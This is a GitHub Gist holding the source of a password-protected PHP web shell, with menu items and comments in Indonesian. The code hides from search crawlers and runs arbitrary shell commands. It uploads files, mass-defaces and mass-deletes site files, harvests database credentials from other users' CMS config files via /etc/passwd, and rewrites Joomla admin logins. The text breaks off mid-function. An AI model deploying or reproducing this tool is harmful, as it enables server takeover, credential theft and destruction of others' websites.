Last active
February 24, 2021 00:23
-
-
Save techs1/7b121301b44d5f20e065726a02ca0a9d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<?php | |
session_start(); | |
error_reporting(0); | |
set_time_limit(0); | |
@set_magic_quotes_runtime(0); | |
@clearstatcache(); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
@ini_set('output_buffering',0); | |
@ini_set('display_errors', 0); | |
$n5s = "373866"; | |
$i6aq = "650583"; | |
$o3le = "956ca0"; | |
$o9pz = "186f84"; | |
$ye7i = "621f42bd"; | |
$color = "#00ff00"; | |
$default_action = 'FilesMan'; | |
$default_use_ajax = true; | |
$default_charset = 'UTF-8'; | |
if(!empty($_SERVER['HTTP_USER_AGENT'])) { | |
$userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); | |
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | |
header('HTTP/1.0 404 Not Found'); | |
exit; | |
} | |
} | |
$setps = $n5s . $i6aq; | |
$setps .= $o3le . $o9pz . $ye7i; | |
function login_shell() { | |
?> | |
<html> | |
<head> | |
<title>xx</title> | |
<style type="text/css"> | |
html { | |
margin: 20px auto; | |
background: #000000; | |
color: green; | |
text-align: center; | |
} | |
header { | |
color: green; | |
margin: 10px auto; | |
} | |
input[type=password] { | |
width: 250px; | |
height: 25px; | |
color: red; | |
background: #000000; | |
border: 1px dotted green; | |
padding: 5px; | |
margin-left: 20px; | |
text-align: center; | |
} | |
</style> | |
</head> | |
<center> | |
<header> | |
<pre> | |
___________________________ | |
,_ _, | |
'.__.' | |
'-, (__) ,-' | |
'._ .::. _.' | |
_'(^^)'_ | |
_,` `>\/<` `,_ | |
` ,-` )( `-, ` | |
| /==\ | | |
,-' |=-| '-, | |
)-=( | |
\__/ | |
___________________________ | |
</pre> | |
</header> | |
<form method="post"> | |
<input type="password" name="pass"> | |
</form> | |
<?php | |
exit; | |
} | |
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) | |
if( empty($setps) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $setps) ) ) | |
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true; | |
else | |
login_shell(); | |
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) { | |
@ob_clean(); | |
$file = $_GET['file']; | |
header('Content-Description: File Transfer'); | |
header('Content-Type: application/octet-stream'); | |
header('Content-Disposition: attachment; filename="'.basename($file).'"'); | |
header('Expires: 0'); | |
header('Cache-Control: must-revalidate'); | |
header('Pragma: public'); | |
header('Content-Length: ' . filesize($file)); | |
readfile($file); | |
exit; | |
} | |
?> | |
<html> | |
<head> | |
<title>xx</title> | |
<meta name='author' content='xx'> | |
<meta charset="UTF-8"> | |
<style type='text/css'> | |
@import url(https://fonts.googleapis.com/css?family=Ubuntu); | |
html { | |
background: #000000; | |
color: #ffffff; | |
font-family: 'Ubuntu'; | |
font-size: 13px; | |
width: 100%; | |
} | |
li { | |
display: inline; | |
margin: 5px; | |
padding: 5px; | |
} | |
table, th, td { | |
border-collapse:collapse; | |
font-family: Tahoma, Geneva, sans-serif; | |
background: transparent; | |
font-family: 'Ubuntu'; | |
font-size: 13px; | |
} | |
.table_home, .th_home, .td_home { | |
border: 1px solid #ffffff; | |
} | |
th { | |
padding: 5px; | |
background-color: #005700; | |
} | |
tr:hover { | |
background-color: #005700; | |
color: #DFD000 | |
} | |
a { | |
color: #ffffff; | |
text-decoration: none; | |
} | |
a:hover { | |
background-color: #6a5501; | |
color: gold; | |
text-decoration: underline; | |
} | |
.Open { color:#000000;background-color:red;font-weight:bold} | |
b {color: gold;} | |
span {color:#8892BF} | |
input[type=text], input[type=password],input[type=submit] { | |
background: transparent; | |
color: #ffffff; | |
border: 1px solid #ffffff; | |
margin: 5px auto; | |
padding-left: 5px; | |
font-family: 'Ubuntu'; | |
font-size: 13px; | |
} | |
textarea { | |
border: 1px solid #ffffff; | |
width: 100%; | |
height: 400px; | |
padding-left: 5px; | |
margin: 10px auto; | |
resize: none; | |
background: transparent; | |
color: #ffffff; | |
font-family: 'Ubuntu'; | |
font-size: 13px; | |
} | |
select { | |
width: 152px; | |
background: #000000; | |
color: lime; | |
border: 1px solid #ffffff; | |
margin: 5px auto; | |
padding-left: 5px; | |
font-family: 'Ubuntu'; | |
font-size: 13px; | |
} | |
option:hover { | |
background: lime; | |
color: #000000; | |
} | |
.FormFile {background-color:#636363;position:fixed;bottom: 0; padding:0,0,0,0;} | |
.FormFile:hover {background-color:#636363;position:fixed;bottom: 0; padding:0,0,0,0;} | |
input[type=submit]:hover {background-color:#005700;color:gold} | |
</style> | |
</head> | |
<?php | |
$file = $_GET['file']; | |
function w($dir,$perm) { | |
if(!is_writable($dir)) { | |
return "<font color=red>".$perm."</font>"; | |
} else { | |
return "<font color=lime>".$perm."</font>"; | |
} | |
} | |
function r($dir,$perm) { | |
if(!is_readable($dir)) { | |
return "<font color=red>".$perm."</font>"; | |
} else { | |
return "<font color=lime>".$perm."</font>"; | |
} | |
} | |
function exe($cmd) { | |
if(function_exists('system')) { | |
@ob_start(); | |
@system($cmd); | |
$buff = @ob_get_contents(); | |
@ob_end_clean(); | |
return $buff; | |
} elseif(function_exists('exec')) { | |
@exec($cmd,$results); | |
$buff = ""; | |
foreach($results as $result) { | |
$buff .= $result; | |
} return $buff; | |
} elseif(function_exists('passthru')) { | |
@ob_start(); | |
@passthru($cmd); | |
$buff = @ob_get_contents(); | |
@ob_end_clean(); | |
return $buff; | |
} elseif(function_exists('shell_exec')) { | |
$buff = @shell_exec($cmd); | |
return $buff; | |
} | |
} | |
function perms($file){ | |
$perms = fileperms($file); | |
if (($perms & 0xC000) == 0xC000) { | |
// Socket | |
$info = 's'; | |
} elseif (($perms & 0xA000) == 0xA000) { | |
// Symbolic Link | |
$info = 'l'; | |
} elseif (($perms & 0x8000) == 0x8000) { | |
// Regular | |
$info = '-'; | |
} elseif (($perms & 0x6000) == 0x6000) { | |
// Block special | |
$info = 'b'; | |
} elseif (($perms & 0x4000) == 0x4000) { | |
// Directory | |
$info = 'd'; | |
} elseif (($perms & 0x2000) == 0x2000) { | |
// Character special | |
$info = 'c'; | |
} elseif (($perms & 0x1000) == 0x1000) { | |
// FIFO pipe | |
$info = 'p'; | |
} else { | |
// Unknown | |
$info = 'u'; | |
} | |
// Owner | |
$info .= (($perms & 0x0100) ? 'r' : '-'); | |
$info .= (($perms & 0x0080) ? 'w' : '-'); | |
$info .= (($perms & 0x0040) ? | |
(($perms & 0x0800) ? 's' : 'x' ) : | |
(($perms & 0x0800) ? 'S' : '-')); | |
// Group | |
$info .= (($perms & 0x0020) ? 'r' : '-'); | |
$info .= (($perms & 0x0010) ? 'w' : '-'); | |
$info .= (($perms & 0x0008) ? | |
(($perms & 0x0400) ? 's' : 'x' ) : | |
(($perms & 0x0400) ? 'S' : '-')); | |
// World | |
$info .= (($perms & 0x0004) ? 'r' : '-'); | |
$info .= (($perms & 0x0002) ? 'w' : '-'); | |
$info .= (($perms & 0x0001) ? | |
(($perms & 0x0200) ? 't' : 'x' ) : | |
(($perms & 0x0200) ? 'T' : '-')); | |
return $info; | |
} | |
function hdd($s) { | |
if($s >= 1073741824) | |
return sprintf('%1.2f',$s / 1073741824 ).' GB'; | |
elseif($s >= 1048576) | |
return sprintf('%1.2f',$s / 1048576 ) .' MB'; | |
elseif($s >= 1024) | |
return sprintf('%1.2f',$s / 1024 ) .' KB'; | |
else | |
return $s .' B'; | |
} | |
function ambilKata($param, $kata1, $kata2){ | |
if(strpos($param, $kata1) === FALSE) return FALSE; | |
if(strpos($param, $kata2) === FALSE) return FALSE; | |
$start = strpos($param, $kata1) + strlen($kata1); | |
$end = strpos($param, $kata2, $start); | |
$return = substr($param, $start, $end - $start); | |
return $return; | |
} | |
function getsource($url) { | |
$curl = curl_init($url); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); | |
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); | |
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); | |
$content = curl_exec($curl); | |
curl_close($curl); | |
return $content; | |
} | |
function bing($dork) { | |
$npage = 1; | |
$npages = 30000; | |
$allLinks = array(); | |
$lll = array(); | |
while($npage <= $npages) { | |
$x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); | |
if($x) { | |
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink); | |
foreach ($findlink[1] as $fl) array_push($allLinks, $fl); | |
$npage = $npage + 10; | |
if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break; | |
} else break; | |
} | |
$URLs = array(); | |
foreach($allLinks as $url){ | |
$exp = explode("/", $url); | |
$URLs[] = $exp[2]; | |
} | |
$array = array_filter($URLs); | |
$array = array_unique($array); | |
$sss = count(array_unique($array)); | |
foreach($array as $domain) { | |
echo $domain."\n"; | |
} | |
} | |
function reverse($url) { | |
$ch = curl_init("http://domains.yougetsignal.com/domains.php"); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); | |
curl_setopt($ch, CURLOPT_HEADER, 0); | |
curl_setopt($ch, CURLOPT_POST, 1); | |
$resp = curl_exec($ch); | |
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); | |
$array = explode(",,", $resp); | |
unset($array[0]); | |
foreach($array as $lnk) { | |
$lnk = "http://$lnk"; | |
$lnk = str_replace(",", "", $lnk); | |
echo $lnk."\n"; | |
ob_flush(); | |
flush(); | |
} | |
curl_close($ch); | |
} | |
if(get_magic_quotes_gpc()) { | |
function idx_ss($array) { | |
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array); | |
} | |
$_POST = idx_ss($_POST); | |
$_COOKIE = idx_ss($_COOKIE); | |
} | |
if(isset($_GET['dir'])) { | |
$dir = $_GET['dir']; | |
chdir($dir); | |
} else { | |
$dir = getcwd(); | |
} | |
if($_GET['act'] == 'Open') { | |
echo "<b>Filename: </b><font color=lime>".basename($_GET['file'])." </font><a class='Open' href='?act=edit&dir=$dir&file=$file'>[Back To Home]</a><body style='color:black'>\n"; | |
echo require($_GET['file']); | |
} else{ | |
$kernel = php_uname(); | |
$ip = gethostbyname($_SERVER['HTTP_HOST']); | |
$dir = str_replace("\\","/",$dir); | |
$scdir = explode("/", $dir); | |
$freespace = hdd(disk_free_space("/")); | |
$total = hdd(disk_total_space("/")); | |
$used = $total - $freespace; | |
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; | |
$ds = @ini_get("disable_functions"); | |
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; | |
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; | |
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; | |
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; | |
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; | |
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>"; | |
if(!function_exists('posix_getegid')) { | |
$user = @get_current_user(); | |
$uid = @getmyuid(); | |
$gid = @getmygid(); | |
$group = "?"; | |
} else { | |
$uid = @posix_getpwuid(posix_geteuid()); | |
$gid = @posix_getgrgid(posix_getegid()); | |
$user = $uid['name']; | |
$uid = $uid['uid']; | |
$group = $gid['name']; | |
$gid = $gid['gid']; | |
} | |
echo "System: <font color=lime>".$kernel."</font><br>"; | |
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>"; | |
echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>"; | |
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>"; | |
echo "Safe Mode: $sm<br>"; | |
echo "Disable Functions: $show_ds<br>"; | |
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>"; | |
echo "Current DIR: "; | |
foreach($scdir as $c_dir => $cdir) { | |
echo "<a href='?dir="; | |
for($i = 0; $i <= $c_dir; $i++) { | |
echo $scdir[$i]; | |
if($i != $c_dir) { | |
echo "/"; | |
} | |
} | |
echo "'>$cdir</a>/"; | |
} | |
echo " [ ".w($dir, perms($dir))." ]"; | |
echo "<hr>"; | |
echo "<center>"; | |
echo "<ul>"; | |
echo "<li>[ <a href='?'>Home</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>"; | |
echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>"; | |
echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>"; | |
echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>"; | |
echo "</ul>"; | |
echo "</center>"; | |
echo "<hr>"; | |
$size = filesize("$file")/1024; | |
$size = round($size,3); | |
if($size > 1024) { | |
$size = round($size/1024,2). 'MB'; | |
} else { | |
$size = $size. 'KB'; | |
} | |
if($_GET['logout'] == true) { | |
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); | |
echo "<script>window.location='?';</script>"; | |
} elseif($_GET['do'] == 'upload') { | |
echo "<center>"; | |
if($_POST['upload']) { | |
if($_POST['tipe_upload'] == 'biasa') { | |
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { | |
$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>"; | |
} else { | |
$act = "<font color=red>failed to upload file</font>"; | |
} | |
} else { | |
$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; | |
$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; | |
if(is_writable($_SERVER['DOCUMENT_ROOT'])) { | |
if(@copy($_FILES['ix_file']['tmp_name'], $root)) { | |
$act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>"; | |
} else { | |
$act = "<font color=red>failed to upload file</font>"; | |
} | |
} else { | |
$act = "<font color=red>failed to upload file</font>"; | |
} | |
} | |
} | |
echo "Upload File: | |
<form method='post' enctype='multipart/form-data'> | |
<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ] | |
<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br> | |
<input type='file' name='ix_file'> | |
<input type='submit' value='upload' name='upload'> | |
</form>"; | |
echo $act; | |
echo "</center>"; | |
} elseif($_GET['do'] == 'cmd') { | |
echo "<form method='post'> | |
<font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font> | |
<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'> | |
</form>"; | |
if($_POST['do_cmd']) { | |
echo "<pre>".exe($_POST['cmd'])."</pre>"; | |
} | |
} elseif($_GET['do'] == 'mass_deface') { | |
function sabun_massal($dir,$namafile,$isi_script) { | |
if(is_writable($dir)) { | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
$dirc = "$dir/$dirb"; | |
$lokasi = $dirc.'/'.$namafile; | |
if($dirb === '.') { | |
file_put_contents($lokasi, $isi_script); | |
} elseif($dirb === '..') { | |
file_put_contents($lokasi, $isi_script); | |
} else { | |
if(is_dir($dirc)) { | |
if(is_writable($dirc)) { | |
echo "[<font color=lime>DONE</font>] $lokasi<br>"; | |
file_put_contents($lokasi, $isi_script); | |
$idx = sabun_massal($dirc,$namafile,$isi_script); | |
} | |
} | |
} | |
} | |
} | |
} | |
function sabun_biasa($dir,$namafile,$isi_script) { | |
if(is_writable($dir)) { | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
$dirc = "$dir/$dirb"; | |
$lokasi = $dirc.'/'.$namafile; | |
if($dirb === '.') { | |
file_put_contents($lokasi, $isi_script); | |
} elseif($dirb === '..') { | |
file_put_contents($lokasi, $isi_script); | |
} else { | |
if(is_dir($dirc)) { | |
if(is_writable($dirc)) { | |
echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>"; | |
file_put_contents($lokasi, $isi_script); | |
} | |
} | |
} | |
} | |
} | |
} | |
if($_POST['start']) { | |
if($_POST['tipe_sabun'] == 'mahal') { | |
echo "<div style='margin: 5px auto; padding: 5px'>"; | |
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); | |
echo "</div>"; | |
} elseif($_POST['tipe_sabun'] == 'murah') { | |
echo "<div style='margin: 5px auto; padding: 5px'>"; | |
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); | |
echo "</div>"; | |
} | |
} else { | |
echo "<center>"; | |
echo "<form method='post'> | |
<font style='text-decoration: underline;'>Tipe Sabun:</font><br> | |
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br> | |
<font style='text-decoration: underline;'>Folder:</font><br> | |
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br> | |
<font style='text-decoration: underline;'>Filename:</font><br> | |
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br> | |
<font style='text-decoration: underline;'>Index File:</font><br> | |
<textarea name='script' style='width: 450px; height: 200px;'>Hacked by Black-TeamX</textarea><br> | |
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'> | |
</form></center>"; | |
} | |
} elseif($_GET['do'] == 'mass_delete') { | |
function hapus_massal($dir,$namafile) { | |
if(is_writable($dir)) { | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
$dirc = "$dir/$dirb"; | |
$lokasi = $dirc.'/'.$namafile; | |
if($dirb === '.') { | |
if(file_exists("$dir/$namafile")) { | |
unlink("$dir/$namafile"); | |
} | |
} elseif($dirb === '..') { | |
if(file_exists("".dirname($dir)."/$namafile")) { | |
unlink("".dirname($dir)."/$namafile"); | |
} | |
} else { | |
if(is_dir($dirc)) { | |
if(is_writable($dirc)) { | |
if(file_exists($lokasi)) { | |
echo "[<font color=lime>DELETED</font>] $lokasi<br>"; | |
unlink($lokasi); | |
$idx = hapus_massal($dirc,$namafile); | |
} | |
} | |
} | |
} | |
} | |
} | |
} | |
if($_POST['start']) { | |
echo "<div style='margin: 5px auto; padding: 5px'>"; | |
hapus_massal($_POST['d_dir'], $_POST['d_file']); | |
echo "</div>"; | |
} else { | |
echo "<center>"; | |
echo "<form method='post'> | |
<font style='text-decoration: underline;'>Folder:</font><br> | |
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br> | |
<font style='text-decoration: underline;'>Filename:</font><br> | |
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br> | |
<input type='submit' name='start' value='Mass Delete' style='width: 450px;'> | |
</form></center>"; | |
} | |
} elseif($_GET['do'] == 'config') { | |
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>"); | |
$idx = mkdir("Xsol-config", 0777); | |
$isi_htc = "Options all\nRequire None\nSatisfy Any"; | |
$htc = fopen("idx_config/.htaccess","w"); | |
fwrite($htc, $isi_htc); | |
while($passwd = fgets($etc)) { | |
if($passwd == "" || !$etc) { | |
echo "<font color=red>Can't read /etc/passwd</font>"; | |
} else { | |
preg_match_all('/(.*?):x:/', $passwd, $user_config); | |
foreach($user_config[1] as $user_idx) { | |
$user_config_dir = "/home/$user_idx/public_html/"; | |
if(is_readable($user_config_dir)) { | |
$grab_config = array( | |
"/home/$user_idx/.my.cnf" => "cpanel", | |
"/home/$user_idx/.accesshash" => "WHM-accesshash", | |
"/home/$user_idx/public_html/po-content/config.php" => "Popoji", | |
"/home/$user_idx/public_html/vdo_config.php" => "Voodoo", | |
"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", | |
"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", | |
"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", | |
"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", | |
"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", | |
"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", | |
"/home/$user_idx/public_html/forum/config.php" => "phpBB", | |
"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", | |
"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", | |
"/home/$user_idx/public_html/app/etc/local.xml" => "Magento", | |
"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", | |
"/home/$user_idx/public_html/configuration.php" => "Joomla", | |
"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", | |
"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", | |
"/home/$user_idx/public_html/wp-config.php" => "WordPress", | |
"/home/$user_idx/public_html/admin/config.php" => "OpenCart", | |
"/home/$user_idx/public_html/slconfig.php" => "Sitelok", | |
"/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); | |
foreach($grab_config as $config => $nama_config) { | |
$ambil_config = file_get_contents($config); | |
if($ambil_config == '') { | |
} else { | |
$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); | |
fputs($file_config,$ambil_config); | |
} | |
} | |
} | |
} | |
} | |
} | |
echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>"; | |
} elseif($_GET['do'] == 'jumping') { | |
$i = 0; | |
echo "<div class='margin: 5px auto;'>"; | |
if(preg_match("/hsphere/", $dir)) { | |
$urls = explode("\r\n", $_POST['url']); | |
if(isset($_POST['jump'])) { | |
echo "<pre>"; | |
foreach($urls as $url) { | |
$url = str_replace(array("http://","www."), "", strtolower($url)); | |
$etc = "/etc/passwd"; | |
$f = fopen($etc,"r"); | |
while($gets = fgets($f)) { | |
$pecah = explode(":", $gets); | |
$user = $pecah[0]; | |
$dir_user = "/hsphere/local/home/$user"; | |
if(is_dir($dir_user) === true) { | |
$url_user = $dir_user."/".$url; | |
if(is_readable($url_user)) { | |
$i++; | |
$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; | |
if(is_writable($url_user)) { | |
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; | |
} | |
echo $jrw."<br>"; | |
} | |
} | |
} | |
} | |
if($i == 0) { | |
} else { | |
echo "<br>Total ada ".$i." Kamar di ".$ip; | |
} | |
echo "</pre>"; | |
} else { | |
echo '<center> | |
<form method="post"> | |
List Domains: <br> | |
<textarea name="url" style="width: 500px; height: 250px;">'; | |
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r"); | |
while($getss = fgets($fp)) { | |
echo $getss; | |
} | |
echo '</textarea><br> | |
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;"> | |
</form></center>'; | |
} | |
} elseif(preg_match("/vhosts/", $dir)) { | |
$urls = explode("\r\n", $_POST['url']); | |
if(isset($_POST['jump'])) { | |
echo "<pre>"; | |
foreach($urls as $url) { | |
$web_vh = "/var/www/vhosts/$url/httpdocs"; | |
if(is_dir($web_vh) === true) { | |
if(is_readable($web_vh)) { | |
$i++; | |
$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; | |
if(is_writable($web_vh)) { | |
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; | |
} | |
echo $jrw."<br>"; | |
} | |
} | |
} | |
if($i == 0) { | |
} else { | |
echo "<br>Total ada ".$i." Kamar di ".$ip; | |
} | |
echo "</pre>"; | |
} else { | |
echo '<center> | |
<form method="post"> | |
List Domains: <br> | |
<textarea name="url" style="width: 500px; height: 250px;">'; | |
bing("ip:$ip"); | |
echo '</textarea><br> | |
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;"> | |
</form></center>'; | |
} | |
} else { | |
echo "<pre>"; | |
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>"); | |
while($passwd = fgets($etc)) { | |
if($passwd == '' || !$etc) { | |
echo "<font color=red>Can't read /etc/passwd</font>"; | |
} else { | |
preg_match_all('/(.*?):x:/', $passwd, $user_jumping); | |
foreach($user_jumping[1] as $user_idx_jump) { | |
$user_jumping_dir = "/home/$user_idx_jump/public_html"; | |
if(is_readable($user_jumping_dir)) { | |
$i++; | |
$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; | |
if(is_writable($user_jumping_dir)) { | |
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; | |
} | |
echo $jrw; | |
if(function_exists('posix_getpwuid')) { | |
$domain_jump = file_get_contents("/etc/named.conf"); | |
if($domain_jump == '') { | |
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; | |
} else { | |
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); | |
foreach($domains_jump[1] as $dj) { | |
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); | |
$user_jumping_url = $user_jumping_url['name']; | |
if($user_jumping_url == $user_idx_jump) { | |
echo " => ( <u>$dj</u> )<br>"; | |
break; | |
} | |
} | |
} | |
} else { | |
echo "<br>"; | |
} | |
} | |
} | |
} | |
} | |
if($i == 0) { | |
} else { | |
echo "<br>Total ada ".$i." Kamar di ".$ip; | |
} | |
echo "</pre>"; | |
} | |
echo "</div>"; | |
} elseif($_GET['do'] == 'auto_edit_user') { | |
if($_POST['hajar']) { | |
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { | |
echo "username atau password harus lebih dari 6 karakter"; | |
} else { | |
$user_baru = $_POST['user_baru']; | |
$pass_baru = md5($_POST['pass_baru']); | |
$conf = $_POST['config_dir']; | |
$scan_conf = scandir($conf); | |
foreach($scan_conf as $file_conf) { | |
if(!is_file("$conf/$file_conf")) continue; | |
$config = file_get_contents("$conf/$file_conf"); | |
if(preg_match("/JConfig|joomla/",$config)) { | |
$dbhost = ambilkata($config,"host = '","'"); | |
$dbuser = ambilkata($config,"user = '","'"); | |
$dbpass = ambilkata($config,"password = '","'"); | |
$dbname = ambilkata($config,"db = '","'"); | |
$dbprefix = ambilkata($config,"dbprefix = '","'"); | |
$prefix = $dbprefix."users"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result['id']; | |
$site = ambilkata($config,"sitename = '","'"); | |
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); | |
echo "Config => ".$file_conf."<br>"; | |
echo "CMS => Joomla<br>"; | |
if($site == '') { | |
echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; | |
} else { | |
echo "Sitename => $site<br>"; | |
} | |
if(!$update OR !$conn OR !$db) { | |
echo "Status => <font color=red>".mysql_error()."</font><br><br>"; | |
} else { | |
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; | |
} | |
mysql_close($conn); | |
} elseif(preg_match("/WordPress/",$config)) { | |
